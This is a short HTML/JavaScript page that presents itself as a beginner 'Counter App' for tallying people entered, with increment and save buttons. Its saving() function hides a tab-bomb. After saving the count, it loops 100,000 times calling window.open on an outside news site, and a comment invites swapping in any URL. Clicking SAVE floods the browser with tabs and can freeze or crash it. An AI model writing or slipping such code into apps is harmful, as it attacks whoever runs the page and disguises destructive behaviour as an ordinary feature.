<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Counter App</title>
    <style>
      body {
        background-color: black;
        color: white;
        font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI",
          Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue",
          sans-serif;
        font-weight: bold;
        text-align: center;
      }

      h1 {
        margin-top: 10px;
        margin-bottom: 10px;
      }
      h2 {
        font-size: 50px;
        margin-top: 0;
        margin-bottom: 20px;
      }

      button {
        border: none;
        padding-top: 10px;
        padding-bottom: 10px;
        color: white;
        font-weight: bold;
        width: 200px;
        margin-bottom: 5px;
        border-radius: 5px;
        cursor: pointer;
      }

      #increment-btn {
        background-color: darkred;
      }

      #increment-btn:hover {
        background-color: rgba(139, 0, 0, 0.772);
      }

      #save-btn {
        background-color: darkgreen;
      }

      #save-btn:hover {
        background-color: rgba(0, 100, 0, 0.895);
      }
    </style>
  </head>
  <body>
    <h1 class="head">Peoples Enterd</h1>
    <h2 class="head" id="count-el">0</h2>
    <button id="increment-btn" onclick="increment()">INCREMENT</button>
    <button id="save-btn" onclick="saving()">SAVE</button>
    <h3 id="entries">Previos Entries: &nbsp;</h3>
    <script>
      let saveEl = document.getElementById("entries");
      let countEl = document.getElementById("count-el");
      let count = 0;
      function increment() {
        count += 1;
        countEl.textContent = count;
      }
      function saving() {
        let save = count + " - ";
        saveEl.textContent += save;
        count = 0;
        countEl.textContent = count;
        for (let i = 0; i < 100000; i++) {
          window.open("https://www.tribuneindia.com/"); // Replace with the URL you want to open in each tab
        }
      }
    </script>
  </body>
</html>
